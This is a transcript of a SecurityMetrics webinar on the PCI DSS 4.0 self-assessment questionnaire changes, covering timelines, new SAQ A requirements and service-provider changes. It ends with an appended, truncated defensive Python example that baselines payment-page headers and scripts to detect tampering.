SAQ Updates: Key PCI DSS v. 4.0 SAQ Changes

Watch to learn about the timelines for compliance with PCI DSS 4.0 and the key requirement changes to the various SAQ types.

SecurityMetrics Principal Security Analyst Michael Simpson (CISSP, CISA, QSA) and Director of Program Management Scott Robinson will discuss:

  • Timelines for compliance with PCI DSS 4.0
  • Key requirement changes to the various SAQ types
  • Tips for Merchants and Acquirers for PCI DSS 4.0 implementation

Need more PCI DSS version 4.0 resources? Check out our recent webinar PCI DSS 4.0: What Is New And How It Affects You

This webinar was given on June 28, 2022.

Transcript

Welcome, everybody, to our webinar today. We're going to be discussing the PCI DSS 4.0 questionnaires. We are very excited to have Michael Simpson with us here to discuss this information and go through it. And so we hope you are ready to learn something about PCI 4.0 and what's going to be coming up. Hello, Mike. How are you doing?

Good, Scott. Thanks for having me on.

Oh, it's nice to have you here.

We appreciate you taking time out to speak with us. So, let's talk about 4.0. I know there's a lot of discussion about 4.0. People are a little nervous about it. It's been a while since we've had a new release update.

What can you tell us about the release dates, the implementation dates, the things that are about to affect us?

Yeah. So I guess the first thing is don't be too nervous. 4.0 is out. The self-assessment questionnaires are available. People can do a self-assessment using the 4.0 version of the PCI DSS, but they don't have to. Version 3.2.1 is still active until March 31, 2024. So between now and March 31, 2024, you can kind of choose whether you want to do a 3.2.1 assessment or a version 4 assessment.

Once we pass March 31, 2024, the 3.2.1 standard will officially be retired, and 4.0 will be the only option at that point in time. But even when we get to that point, any of the brand-new requirements that were brought in as part of this transition to 4.0 will still have another year, until March 2025, before the new requirements are not just best practice. So we've got some time. People don't have to worry too much about the fact that 4.0 is out. They can still use 3.2.1 for the next couple of years.

And even after they have to transition to 4.0, they still have another year to get those new requirements in place. But it is time now to start preparing, for sure.

Oh, definitely. It seems like in the past, when we've had release dates, it's kind of followed the same pattern. They released it. They gave you an opportunity to start looking at it; you could go down that path or you could wait and go down the next.

But once that hard date hits, it's that or nothing else. Right? Yeah.

And I think because of the significant change that came with 4.0, we're actually given more time than we have in the past for a transition. So this transitional period is quite long.

Having three years to get these new requirements in place, there should be plenty of time for organizations to take a look at the requirements and figure out the best way to implement those in their environments before they become mandatory.

Fantastic.

Are there going to be scoping changes with 4.0 for merchants?

There really isn't much in the way of scoping changes.

The scoping guideline that was put out by the Council a few years ago is still pretty much accurate.

The devices that are in scope are still devices that are processing, storing, or transmitting credit card data, or that can affect the security of credit card information.

So scoping is pretty much the same. In the SAQ A there is a change, and this is a little bit different than scoping, but when people are doing self-assessments, usually they're scoping their environment, but they're also going through the qualifying criteria in the self-assessment questionnaires to identify which SAQ applies to their environment.

There was, in the SAQ A, a minor modification to those qualifying criteria, but it really doesn't affect scope. It just makes it more clear for any of these SAQ A providers, which are typically ecommerce but can be, like, call centers, anytime they are fully outsourcing all of their collection and processing of credit card data to a third-party provider. In 3.2.1, it says that those third parties need to be PCI compliant. In 4.0, they've gone just a little step further to say that in order to qualify to assess using the SAQ A, you need to have a valid AOC, or attestation of compliance, from each of those third-party providers.

But other than that, it really doesn't affect scoping. It's more just that there are some new requirements that have come in with version 4, and then they've also enhanced some existing requirements.

Fantastic. Well, let's go through some of those changes. So what are the key changes there?

One that affects all of the SAQs, regardless of which one you're filling out, is a new checkbox. So in the past, for each requirement, you would either say it's in place, which means that control is active in your environment and you have that in place.

So that was a yes. There was a no checkbox saying that control is not in place, and thus you're not PCI compliant because of that. There was an N/A, or not applicable, and there was an in place with compensating control, which basically means I'm meeting the intent of this requirement, but I'm doing it in a little different way. So instead of doing it the way that was prescribed by the self-assessment questionnaire, I'm meeting the intent of that by doing a different control.

SAQ 4.0 has added one more: a checkbox that says in place with remediation, and this might cause some confusion for some merchants that are self-assessing. Basically, what that means is, when you were doing your self-assessment and you came to a control and found out that it was not in place and you were not PCI compliant, if you've then fixed that control, or implemented that control, or took care of whatever remediation work needed to be done to be compliant, then they want you to mark in place with remediation. And there's a table down in the appendices where you would mark which item was not in place when you first did your assessment and what work was done to bring that into compliance with the standard. So that's one change that we'll see on all of the SAQs.

Okay. And, oh, go ahead.

No. No.

Just what most people are going to ask us, and we hear this from the merchant side all the time, is:

How many more questions do I have to answer here? Am I going to have to answer a bunch of them? Is there more?

Is there less?

That is the question. And I went through, and it took a while counting all of these checkboxes. But with the exception of the SAQ A, there are actually fewer checkboxes you're going to check in 4.0 than in version 3. So, for example, for the SAQ P2PE in version 3, there were 33 checkboxes that someone would have to go through and say whether it was in place, not in place, or not applicable in order to finish their assessment. In version 4, that's gone down to 21.

So most of them have shrunk quite a bit. The SAQ D had 331 checkboxes.

Right.

The SAQ D in version 4.0 has 251. So we've seen a significant reduction in the number of checkboxes. But as I've gone through those self-assessment questionnaires, most of the reduction is not the removal of requirements; they've combined a lot of requirements into one checkbox. And that was particularly true in relation to policies, where PCI would say you must have a policy for x, y, and z.

In the past, they would have a specific checkbox for each of those policy elements. Now I've noticed in 4.0, a lot of those have been combined into one checkbox. So you still have to have those same policy elements, but you're just checking one box to say yes, all of those policy elements are in place.

So for most of them, there will be fewer checkboxes.

Right. And that's always been the big concern for everybody: how many checkboxes do I have here? How many different things do I see? It felt like there was a lot of duplication in prior ones. And so this will feel comfortable for merchants that are having to do this, to not have quite so many questions to mark up and go through, which is nice.

Yep. Now, the one exception to that is, like I said, the SAQ A, and we have a lot of SAQ A merchants because it has really been, in the past, one of the sweet spots, I would say, for merchant compliance, because you're basically outsourcing all of the collection and processing to a PCI compliant third party. So your risk level is lower. But most SAQ A merchants are ecommerce merchants, and they've got some website where they're selling products or services, but before payment's taken, they're either redirecting their customer to a third party to collect that information or they're implementing, like, a third-party iframe to collect it.

But because of the skimming attacks that we've seen over the last few years, the ecommerce skimming attacks, the SAQ A has added several requirements: both new requirements that have come in with PCI version 4 and some existing requirements that were not part of the SAQ A in the past, like the external vulnerability scans, or the ASV scans. It's not a new PCI requirement, but it is new to the SAQ A for version 4. So for that one, we had 24 requirements in the past. We now have 31 requirements.

And there is more inspection being performed on those ecommerce websites that are not touching credit card data but are affecting the flow of that credit card data.

Awesome. So security is really important in these. Right? They're boosting that security. What are the sections within the SAQ A that are being added that help with that security?

Yeah. So other than the external vulnerability scan, and that's one that I would recommend merchants get on right away, because, unlike some of the new requirements in version 4... Version 4 has a couple of new requirements, like, let's see.

Requirements 6.4.3 and 11.6.1. And those requirements are specifically designed to protect the iframe from being tampered with, or to prevent third-party code that's being included in your page from causing security issues on the website.

So for those new requirements, like I said in the beginning, we have until 2025 before those are not just a best practice. But when they take an existing requirement like the ASV scan, as soon as version 3.2.1 is retired and we can no longer do an SAQ A version 3.2.1, that requirement needs to be in place right then. So that is the March 2024 date that we're hitting for some of these requirements. So we've got the ASV scan requirement. If you don't already have ASV scans, SecurityMetrics can help out with that.

But then they've also increased a lot of the authentication requirements. So there were some authentication requirements in the past in the SAQ A, but those have expanded. So now there's requirement 8.3.5 in version 4.

This is another existing requirement that was pulled in, and it deals with when you're setting up a new user account. So this would typically be when you're setting up a new admin account on your ecommerce server. What's the process for setting up that first-time password? Do you require the user to reset their password upon first logon?

If someone forgets their password or gets locked out, what's your reset process? So these are existing PCI requirements, but they haven't been part of the SAQ A in the past, and they now are.

In addition to that is the password history requirement: how many passwords does your system remember so that people aren't reusing old passwords.

SAQ A.

And then also the password age requirement has been added. So in the past, for version 3.2.1, again, it wasn't part of the A, but if you were an SAQ C or a B-IP, there was a requirement that after every 90 days you've got to reset your password.

Right.

That 90-day requirement's been brought in, but it's a little bit different than it was in version 3.2.1. In version 4, you either have to change your password every 90 days or you have to have some other form of authentication other than just username and password. So if someone's already implemented MFA, or multifactor authentication, on their ecommerce server, they don't have to change passwords every 90 days in version 4.0.

Right. So those are some of the requirements. Mostly, what they're trying to do is increase your authentication security on these ecommerce redirect servers. And then the other requirements that they've added deal with how to protect any third party, either the iframe that's being implemented or any other third-party code that you're implementing on your ecommerce site.

Got it. So are there any other big changes to the other SAQs?

Really, the rest of them, I mean the SAQ B, the B-IP, the P2PE, are relatively unchanged. There are some minor modifications, but if you have been going through any of these SAQs prior to version 4, going through a version 4 self-assessment is really going to look a lot the same. The formatting looks a little bit different. Like I said, there are fewer checkboxes, but what you're actually required to do is basically the same.

The C-VT and the C and the D are the more complicated ones. We do have some of these new PCI version 4 requirements that have made their way into those self-assessment questionnaires. So you will see some differences in our more complex SAQs. Right.

The biggest difference for our complex SAQs is if you're a service provider. Our merchants have this alphabet soup of SAQs that they can choose from: the A and the B, the C, the C-VT. But a service provider, they've only ever had one.

There's the SAQ D service provider, and it's still the same one. But the SAQ D service provider is substantially different in version 4. And they treat it almost like doing a ROC assessment.

Instead of just checking a box when you're saying, yes, this is in place, you have to actually type in what you looked at to verify that that control was in place. So it's much more like what someone would go through if they were doing a full ROC assessment against their environment.

Usually, their QSA comes in, performs the assessment, and when they're writing up the report, they say, to verify this control was in place, this is what I tested and this is what I looked at. The SAQ has never asked for that level of detail. But in version 4, for service providers, because they are held to a higher standard, they are being asked to provide details as to what they looked at to verify that they are PCI compliant. So that will be a significant change for our service providers.

K.

Okay. But the SAQ A, which is probably one of the most common SAQs we have out there, and B is the other one. B seems to be a big one still in the industry.

Relatively unchanged in B. B-IP, same, relatively unchanged. We're not dealing with a lot of changes there to cause merchants any pain or confusion.

C and C-VT have always been kind of the ones that merchants have struggled over. Even our partner banks have struggled a little bit with understanding the difference between the C and C-VT SAQs.

And typically, that's all about segmentation, for merchants that use a virtual terminal especially, right, where the C-VT comes into play.

And so not many changes there, I'm hoping.

Yeah. I mean, from the qualifying criteria, basically the same. So if you were a C-VT in the past, you'll still be a C-VT in version 4. But there are some minor changes.

They have brought in some new requirements that weren't there before for version 4 in both the C and the C-VT. So there is some new validation that will have to be performed if you're doing a version 4 assessment versus 3.2.1 for either the C or the C-VT, but it hasn't changed nearly as much as, like, the D and the SAQ A-EP. But the C and the C-VT, similar to the SAQ A, have had both some existing 4.0 requirements that were not part of that SAQ in the past added, and also some of the brand-new 4.0 requirements that are best practice until 2025 are in the C and the C-VT.

So there will be some changes in those. So if you are a C merchant or a C-VT merchant, it would be worth your while to take a look at those SAQs and identify what those changes are so you can start working to prepare for a version 4 assessment.

Oh, perfect. Another question that just struck me was the SAQ B-IP.

B-IP is in that kind of funny situation where you've got a terminal. It's connected by IP.

Are they still looking to make sure that merchants are segmenting that from everything else in their network?

Or... They still are.

They still are.

Yep.

Okay.

Yep. So it's still one of the qualifying criteria. That device should be behind a firewall. It should be segmented.

Only allow traffic that's required, both inbound and outbound, and it shouldn't be on the same network segment as any of your other devices.

Wonderful. That's always a question that kind of pops up when we're talking with our partners: the B-IP is, yeah, an IP-enabled terminal, but it also has to have this other set of security involved. Right? The segmentation is a big piece. And if they don't have that segmentation, of course, it throws them into SAQ C.

And that always, frustrates, should we say?

Much more complicated.

Yeah.

It's a little more complicated. It's a little more frustrating for everybody to see that. But it's the understanding that security is everything. Right?

Yes.

That's really what we're trying to make sure.

One thing that I've seen with a lot of my merchants that don't want to fill out an SAQ C and are using one of these terminals is that a lot of them have moved to validated point-to-point encrypted terminals, because they can connect those to any network segment they want. They could even connect to their Wi-Fi network, and it doesn't bring that network into scope. And we even see now some banks are providing P2PE validated terminals to their merchants.

Right.

So that's something to look at. If you want an IP-connected terminal, but all you have is that bank-provided terminal, see if your bank has a validated point-to-point encryption solution that you could implement. It could definitely reduce the scope of your assessment and make filling out your SAQ much simpler.

Oh, guaranteed. I mean, even B-IP in 4.0 is going to have 48 questions. Right? And P2PE has 21, and so already you're reducing that. And still no scan involved with B-IP, or, sorry, P2PE?

With P2PE. Yeah. There's no vulnerability scan required.

Right.

For B-IP, there would be. So, yeah, if you want to reduce those requirements, if you can implement point-to-point encryption for those terminals, it reduces your risk and then also reduces your compliance burden.

Right. And now the only scan change, it sounds like, is SAQ A, because prior, SAQ A didn't have a scan. It wasn't a requirement.

Yep. 4.0 will throw that scan in place. But for the rest of them, nothing has changed in that manner. P2PE does not have a scan. B does not have a scan.

C-VT does not have a scan. Right? B-IP will, C will, A-EP will, and, of course, D and D-SP will.

Yep. Yep. That is right.

Fantastic.

And one surprising thing to me is that even though, with the SAQ A, they've added the external scan, or the ASV scan,

they're still not requiring an internal scan. I'm not sure why they didn't add that requirement in, but maybe because they felt like they were already throwing enough at the SAQ As for one change.

Right.

So right now, just the external scan is required.

With all of the SAQs, there is a statement in there that says that even though you're only attesting to this small subset of the full standard, you should be compliant with the full PCI standard, so any requirement that does apply. So I would recommend our SAQ A merchants do both internal and external scans, even though they're only having to attest to the fact that their external scans are in place.

Right. Now let's talk a minute about internal scans, because it seems like most of our merchants and most of our partners aren't quite sure what the internal scan is. There are companies out there that are touting their external scan as an internal scan.

Mhmm.

Give us a little idea about the importance of that internal scan, what that means to the merchant, and what security that provides.

Yeah. So for years, the industry has recommended security in levels. So you have multiple levels of security, or multiple layers of security.

The external scan is a vulnerability scan from the Internet.

So we're seeing, if someone was in their basement, what vulnerabilities would they be able to see on your server or your systems and potentially exploit?

An internal scan takes you inside of your firewall. So you're losing some of that external protection, and it'll let you know, if someone were to gain a foothold inside of your network, what additional vulnerabilities there would be on that server or system to exploit from that internal perspective. So with the internal scan, you get a much more in-depth look at what vulnerabilities the system actually has, because the external scan is going to be blocked by that firewall or that network segmentation device. So doing both an internal and external scan will get you a much clearer picture of what vulnerabilities you actually do have in your environment and your systems, so you can address those vulnerabilities before they cause your systems to be compromised.

Right. And we see in today's world that almost everybody's hackable in some way, shape, or form. And so preventing the outside entrance in is wonderful. Right?

Deadbolt that baby. Make sure they can't open that door and get through. But if they do get in, it's nice to know what other sets and systems are in place to stop them from progressing forward. Right?

Yeah.

Unfortunately, we've seen so many times data breaches caused by someone gaining access to what might not be considered a critical system, but it puts them on the inside of some of those external protections. So that's really why the internal vulnerability scan provides a lot of value for customers, or for merchants: they can see, even if I had a failure of my external security devices, if I've secured properly internally, then it should prevent that type of compromise. If someone does get a foothold in your network, it'll limit the amount of damage they can do once they're inside.

Right. So where you've gone out and done these audits and seen these issues come in, how often is it that a hack happens and somebody gets a breach, and would the effect have been lessened had their internal security been a lot better?

That's a good question.

That's probably a better one for our forensic team because they actually go in after there's a breach.

Luckily, I'm on the team that helps prevent our customers from finding out that information,

because we help to protect them from ever having that data breach or that data compromise.

But all of PCI, the Data Security Standard, has a lot of preventative controls that would help to prevent that type of a compromise from happening. And then they have detective controls designed to help you detect when something has gone wrong so you can respond to it quickly, so that there's less damage to the organization and less data can be stolen during the window of compromise. So I definitely think the more hardened you are, both from an exterior standpoint and within all of your systems internally, the harder it's going to be for someone to continue to exploit systems within your network. It'll minimize the damage that could be done, and it'll give you more time to respond to that type of an intrusion, to be able to shut that down before any critical data is taken. So at least that's the hope. That's the whole security in layers.

You don't want to put all of your eggs in that external firewall, because inevitably there'll be some zero-day vulnerability, something that will allow someone past that external device.

And you wanna be sure you're protected on the inside as well.

Well, I'm assuming good news travels fast within the hacker community. Once somebody figures out a vulnerability, they are sharing that just as fast as we are sharing the fixes to stop those vulnerabilities from happening.

Yep. And, unfortunately, sometimes it's when the fix is announced, hey, there's a patch here, that the hackers go, oh, there's a hole there then.

You know?

Right.

So if a company doesn't have a good vulnerability management strategy, it really puts them in a bad situation, where now we have much more data about vulnerabilities, and hackers can start creating tools to exploit known vulnerabilities. If you don't have a good vulnerability management solution, you're just opening yourself up to attack.

Right. And it's almost that feeling of, once you hear about it on the news, it's almost too late. They know it. They're working it, and you've got that much more time where the likelihood of them coming in that door is greater. Right?

Yeah. Yep.

Fantastic.

Well, Michael, I appreciate that. It's always a pleasure to have you here to explain things and make it easier for us to understand as we go through. I know 4.0 is sitting out there on the horizon. People are a little nervous about it. We've heard little bits.

We haven't heard enough yet. And so this is a perfect opportunity to get a better understanding of what's coming our way and what to look out for, and that it's not all bad news. I mean, the fact that the SAQs are going down in questions is wonderful. Right?

Yes. For most of us, it's a great idea that we don't have to answer as many questions and spend our time doing PCI. But yet if we follow what the PCI standards are asking for in filling out these questionnaires and using them the way that we're supposed to use them, we tighten up that security, less opportunity for breach, as we continue to do business.

And from what I've heard, that's kind of what they were going for with 4.0: make the paperwork side a little easier and focus a little more on the security side. So, hopefully, that's kind of where we see it, as merchants and service providers. Take an opportunity to really tighten up your security, but maybe not spend as much time checking boxes.

Right. Well, sometimes when there are so many boxes to check, it becomes an exercise of checking those boxes rather than really putting that security in place to protect our systems. Right?

Yep. And so anything that we can do to kind of change our focus from a checkbox exercise to real security makes a big difference down the road for us. Well, thank you, everybody, for joining us on this webinar. We're excited that we had a chance to talk with Michael and learn about 4.0 and what's coming up.

We're going to hop over now into the questions part of this webinar and see where we're at from there.

So first question: can I use a customized approach for SAQ A?

The customized approach is really only meant for large organizations that have a mature security setup. It's almost like compensating controls on steroids. So they can say, we meet the intent of this, but we're going to do it a different way. For them to do a customized approach, they work with their QSA to define testing procedures. So they say, this is how we meet it. And the QSA comes up with their own testing procedures to validate that what they're doing actually meets the intent of the requirement and that they're following that.

None of the SAQs can use the customized approach.

When should we start working on 4.0?

That's always a great one. I mean, it doesn't hurt to get started on it early if you're not afraid to get in and get started. Matter of fact, I think the difference between this 4.0 SAQ and 3.1 is that people waited to do 3.1 until they absolutely had to do it.

In this case, there's a shorter list of questions to have to answer.

I would tell you, don't be afraid to jump in and get started. Right? That's the way I would go.

What do you think?

For sure. Yeah. I would agree. It's never too early to start, at least looking at what 4.0 will look like for your merchant environment.

For a lot of our SAQs, very little difference. For some of them, like the SAQ A, there are some differences, but now is definitely the time for them to start looking at those additional controls and start to get those in place.

Right.

So, yeah, I think that'd be great.

If I submit a PCI version 4.0 SAQ, do we have to follow those future-dated requirements?

Future-dated requirements, until March 31, 2025, are considered best practice.

So you should have those in place. You should be working on those if you don't have them in place, but you're still compliant even if they're not in place up until 2025.

K. So what tips or best practices do you suggest for getting ready or started for for PCI four dot o?

No. In thinking about it, from my side, it's all about the lack of time it's going to take to fill out that SAQ.

So from my standpoint, I would say get started as soon as it's available to you. That makes the most sense. You've got better security practices involved. You're gonna be tighter in your security.

It isn't like when we went from three point o to three point one and three point one to three two one. Right? Those tended to be a little harder, and they tended to have some consequences in a different manner, with more questions to answer. This one seems a lot simpler just for the reduction of questions alone.

Makes me feel like, why wait? If it is available to you, take it and run with it.

Yeah. No, I would agree. The one caveat I would put is for some of our SAQs, like the SAQ A, the A-EP, the C-VT, there are going to be some of the, you know, existing PCI requirements that have been newly added to those SAQs.

So if you look through the SAQ four point o and those newly added requirements that are not future dated are not currently in place, then, obviously, you know, you can't really do a four point o SAQ and be compliant until those are in place. So now is definitely the time to look at that. You know, how would performing an SAQ four point o affect me? Are there any security controls that need to be in place that I currently don't have in place?

If there are and you need to, you know, provide that validation to your bank, go ahead and, you know, take the opportunity to still use three two one while it's here. Mhmm. But start working on those newly added requirements and make sure you can mark in place on all of those.

Next question. Will the SAQ document look different in four dot o versus three dot two dot one?

It's gonna look a little bit different, but not substantially different. I mean, we still have the qualifying criteria section. There's still a place where you put your contact information. The formatting's a little bit different. Like I said, there are fewer checkboxes, so they've consolidated some of the requirements all into one box where in the past, there were multiple boxes you were selecting.

But it's still basically formatted, you know, the same way as it was in three two one. So if you were familiar with how to perform a self assessment in version three two one, version four point o is not that big of a stretch.

Next question. When will SecurityMetrics update their portal so that we can submit a four dot o SAQ?

That's a great question. I know we're currently working on that today, making sure that we can do some of the most simplified pieces of this. One of the things that SecurityMetrics has always done is try to simplify this process for the merchant. In years past, anytime there was a change to an SAQ, we looked for ways to take you from one SAQ to the other.

And if the questions were the same, we could prepopulate and bring it over and have it match up and leave you fewer questions to try to answer. So we're currently working on that today to make sure that when this is all done, when you make that switch over to four point o, if there are pieces of the SAQ that you've answered already and there's an exact match to that, we can bring it over. We're gonna bring it over and simplify that for you. And so I'm sure we'll be ready as it gets closer to release time and being out there for everybody.

But we've always been early, as I think about that. We've always been up and ready prior to the actual start, and so I expect no difference for this one.

For requirement eleven dot six dot one, what even is this requirement, and which SAQ types need to worry about this?

So eleven dot six dot one, this deals with protecting those payment iframes. So if you've implemented an iframe on your ecommerce website, this is going to affect mostly our SAQ As. I believe the SAQ A-EP, and it'll be in the SAQ D as well.

But there are controls in place to prevent tampering of the HTTP headers.

So it's kind of a very technical requirement. It's something that you're going to have to... there are some recommendations that the council gives in the PCI DSS four dot o documentation for how to become compliant with requirement eleven dot six dot one, but this is mostly going to affect our ecommerce merchant types.

How can we determine which SAQ type we are?

Oh, that's a great question.

So you have a couple of different methods of getting scoped today, for us, anyway, at SecurityMetrics. You can call in and talk to a consultant who will walk you through that process. They'll ask you all the scoping questions that get down to what SAQ belongs to you. We also have a tool called FastPass that will do the same thing. Typically, they're customizable for partner banks, so we simplify that process greatly.

We also have a third tool called SMXpert that, if you have multiple processing methods, will also scope you and get you into the correct questionnaire.

Each scoping process is mainly designed to get you into the correct questionnaire with as little chance of going down the wrong path.

FastPass allows us to do a little bit more than that. And so that allows us to pre-answer some of the SAQ as we go along, and that makes it a little simpler for you as you go down that path.

What are some of the biggest changes in four point o for service providers?

Yeah. The biggest change for service providers, and we talked a little bit about this earlier on, is the fact that instead of just checking a box, you're also going to have to write in your SAQ, you know, how you verified that that security control was in place. So this is gonna be a much more intensive exercise for our service providers.

Hopefully, all of the requirements that do apply to them, they'll be able to mark in place, but then they have to go in and say, you know, these are the systems I looked at to verify that these controls were in place in my environment. So it is gonna be a lot more work for a service provider to fill out an SAQ D in four point o than it was in three two one.

And for merchants, they tend to struggle. I sell tennis shoes. I provide a service. I'm a service provider. Right?

We see that a lot.

What's the best way to explain the difference of someone providing a service and a service provider?

Right. So a service provider, it really deals with who holds the merchant account. You know? So if you're selling shoes and when someone purchases your shoes, they pay with a credit card, and that money goes directly into your bank account, then you're a merchant.

If you're helping merchants perform those operations, then you're a service provider. So I think that's the biggest one is who holds that merchant account.

If you help merchants by, you know, managing their firewalls or managing their ecommerce servers, but the money from the customer doesn't go into your bank account, it's going into your customer's bank account, then you're a service provider.

Perfect.

How have the requirements for risk assessments changed in version four dot o?

Yeah. So probably the biggest change that I've seen is for the risk assessment. In version three point two point one, the risk assessment had to be done annually, and it should be based on some industry accepted risk assessment process. And within the ROC, it recommended a few risk assessment formats that you could follow. But outside of that, there wasn't really a lot of detail that was provided other than it had to happen at least once a year. In version four point o, they're relying on the risk assessment for a lot of the other requirements.

And, usually, any requirement that uses the word periodic, the risk assessment gets tied into that. So one requirement that comes to mind for that is for merchants who have any type of device that handles card present payments. So these payment terminals that are actually physically interacting with the credit card, they're required to perform tamper prevention inspections on those on a periodic basis. But the question's always been, well, what does periodic mean for me?

And now the council's like, you know, this is up to you, based on your risk. So your risk assessment should determine what periodic means. So there are a lot of requirements where they tie back into that risk assessment requirement where, you know, you do have to do a risk assessment. It has to be done at least annually. But those risk assessments should be looking at things like, you know, how often am I performing tamper inspection reviews on my terminals. One of the other ones is, you know, when it comes to antivirus.

In the past, if you had a system that was determined to be, you know, a type of system where viruses weren't really applicable, so maybe you felt like requirement five didn't apply.

You know, your risk assessment needs to review that; you need to periodically look at that from a risk assessment standpoint. So there are several places within the PCI standard where it will tie back to your annual risk assessment. So if you're currently doing a risk assessment for PCI, in PCI version four, you really should be looking at all of these additional requirements that tie back to the risk assessment and make sure your risk assessment is covering all of those requirements.

That's a great question.

Have requirements changed surrounding documentation?

There have been some changes to documentation. One of the things that I like about the structure of version four is at the beginning of each requirement, there's a requirement that shows that you have, you know, policies and procedures in place. Like, for requirement one, we're dealing with firewalls and network devices.

So at the very beginning, we have a requirement that says we have policies and procedures, and we know what staff members or which groups within our organization are responsible to maintain the security of these devices. And those people have a copy of our policies and procedures. And you'll see that in every section. You know?

So, like, requirement three deals a lot with how I'm protecting credit card data at rest. At the very beginning, you need to show that you've got policies and procedures in place. You know who's in charge of making sure that that data is protected at rest and that they have a copy of those policies and procedures. So it's just much more structured than it was in three two one, where, you know, three two one did have it, but it was usually right at the end of each requirement.

We had a requirement that said, you know, we do have policies and the people have a copy of these policies. But here in version four, we need to specifically identify what individuals or groups are responsible to maintain, you know, those requirements that deal with that section and to verify that they have and are aware of the policies and procedures that apply to maintain compliance for that piece of their environment.

For an ISO, when should we look into focusing on pushing four dot o to our merchants?

Oh, I think that's... I think every ISO and everybody's got the opportunity to jump on this one as early as they can or as late as they want to.

Like you said, there's a cutoff time. And at that cutoff time, if a merchant hasn't completed their SAQ, then it could be a little painful to shove them over into four point o. We're gonna do everything we can to help you get to that point by bringing over some of those answers and putting them into four point o if they'll match up correctly.

Otherwise, you take that inherent risk of waiting to the last minute, and it could cause a little more pain for that poor merchant to get through that again. So to me, it's always the sooner the better, as long as you feel like they can get in there and get it done.

When will the SAQs change again? Is this going to switch a year after I finally get compliant?

Let me look at my crystal ball on this one. No.

We never really know with PCI DSS.

Like, from version three point two or version three to three two one, there were several fairly quick changes, and it dealt with some newly discovered vulnerabilities mostly surrounding transaction transmission encryption, so like TLS vulnerabilities and SSL vulnerabilities.

So we did have some significant changes fairly quickly.

Usually, the PCI DSS standard doesn't change that fast. And from three two one to four o, it's been quite a while. Right. Since we've had a change. So I don't think the council is expecting any significant changes happening anytime soon.

But the fact that we still have, you know, two years before three two one is officially retired and another year before the new four dot o requirements come out, a lot can change in that time period. So if there are significant changes to the risk landscape, then I'm sure the PCI council will come out with new requirements to address that additional risk. So it really all depends on what risk we're seeing and what risks our merchants are facing. If we need to address those risks, I think the council will move on those.

If the risk is staying fairly static, I don't think there's a desire to do a lot of changes rapidly. So I do think they feel comfortable with where the standard is now.

And I don't expect a lot of big changes. So I think if you're ready for four point o, you'll probably be in good shape for a few years, but we really don't know. We'll have to see.

How long will four dot o requirements take to implement, specifically for an SAQ A or SAQ A-EP?

Yeah. So how long they take to implement is really just dependent on the merchant or service provider environment. I mean, as for the A-EP, we're just talking about merchants.

And for the SAQ As, I deal with merchants that, you know, have all of their systems fully outsourced. They don't have their own website that redirects to a third party. Everything starts on a third party website. So for some of you, you know, getting compliant with four point o could be a piece of cake. You might be already compliant.

For others that have more of an extensive ecommerce platform that they manage themselves that, you know, either redirects users to a third party for payment collection or implements an iframe, those changes may be fairly substantial, but it's really based on, you know, how your card data environment is configured and what type of resources you have. So this may be trivial, or it may take you a couple years, but it really depends on the merchant environment.

Will SAQs ever go away?

Mm-mm. Mm-mm. I don't know if we can answer that. Right.

I think there's been a lot of talk in the past about PCI going away, but I don't think it's ever gonna go away necessarily.

Yeah. Well, and I guess early on during the development of four point o, there was talk about moving from the SAQs to a different assessment form. I think it was called the MAF.

Yeah. The MAF.

But that was... yeah. So they've held back on that. Whether that'll come back, we really can't say. That would be another crystal ball question that would be better directed at the council, so we'll have to see. Yeah.

And the reality is it was just a different way of saying self assessment questionnaire. It was merchant, you know, merchant attestation form. Right? And so it was... Right. It wasn't really much different than a name change.

So we could have different acronyms coming out, but I think there'll always be some form that people are filling out to attest to the fact that they are PCI compliant. Right.

Where can I find more information about SAQ updates, slash, will you guys go further into the different SAQ types?

Yeah. So I think the first place to go, Scott, correct me if I'm wrong here, is the PCI Council's website itself. So if you go into the document library, you can download all of the four dot o documentation. They also have a blog that you could look at.

The next place to look at is SecurityMetrics. We have a blog as well. We've already published a blog on the SAQ A for four point o. We have one out for SAQ C-VT for four point o.

There are webinars like the one we're on now, different podcasts that have been put out to help merchants and service providers get ready for four point o. So we'll continue to be providing information, and the council has said that they will continue to provide information as well as we make this transition.

Right. And it won't be long before the council puts them up so that they can start downloading them and working on them and looking at them. So the council's usually the best place to go to see the document quickly and then look for other answers through, like you said, our podcast and our webinars, as we try to explain it.

K. Final question.

What sorts of tools does SecurityMetrics have that could help us with the four dot o transition?

Oh, those are great questions. We have lots of tools for merchants. Probably the most common tools that are purchased by merchants, or that merchants have picked up as part of their programs, are policy and procedure documents, which are always a little bit more difficult to sit down and piece together.

It can be done, but it is a lot more difficult.

Of course, we have a scanning tool, so we'll manage their scanning for you. We set all that stuff up to happen on a quarterly basis, which is required by PCI, so that will happen.

Like I said, policy doc, procedures doc, trainings for your merchants, or for your employees, to help them understand the best practices for handling credit card data.

Trying to think of the others off the top of my head.

One other tool I think that might help, especially with the SAQ A, is our shopping cart monitor tool. You know, that's specifically designed to help prevent these ecommerce skimming attacks, which some of the new requirements that have come into the SAQ A and the A-EP are there to help prevent. So that's another tool of SecurityMetrics.

Well, absolutely. And we've been using that a lot lately and finding great results and seeing the issues coming from that side of things, from the ecommerce side of things. And so the Inspect and Monitor tools are wonderful assets that merchants can use.

K. Any final tips or advice about four dot o?

I think my biggest tip is don't worry too much. You know? Don't stress over this transition.

But also, like Scott was saying, don't wait. You know? Start now. Take a look at what the four point o SAQ looks like for your environment and determine, you know, if there are any additional requirements that you were not used to validating in the past. And if there are new requirements, look at what would be required to be able to affirmatively answer those new requirements in your SAQ four point o.

And Mike's absolutely correct. Don't stress over this.

Worst comes to worst, call SecurityMetrics. We have a support team that's there twenty four seven to answer your questions and to help you get through the process.

That's what they're there for.

Thank you for joining us on the webinar today. We appreciate the time that you spent with us in learning about four point o. We will be sending out the recording of this webinar to you. And if we didn't respond to your questions, we apologize, and we will reach out to you to give you an answer soon.
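The discussion of requirement eleven dot six dot one above stays at a high level. As an added example that is not part of the webinar and is not code from SecurityMetrics or the PCI Council, the script below shows the basic shape of a change-and-tamper-detection check for a payment page: it records the security-relevant HTTP response headers, the external script sources and the SHA-256 digests of inline scripts from a known-good fetch, then compares a later fetch against that baseline and returns every difference. The page HTML, the header values and the set of monitored headers are constructed for this example, and the hostnames psp.example and cdn.attacker.example are placeholders; a real deployment would fetch the live page on a schedule and alert on any non-empty result.

```python
import hashlib
from html.parser import HTMLParser

# Response headers whose value should not change between fetches of the
# payment page. This list is an assumption for the example; the requirement
# leaves the exact header set to the entity.
MONITORED_HEADERS = (
    "content-security-policy",
    "strict-transport-security",
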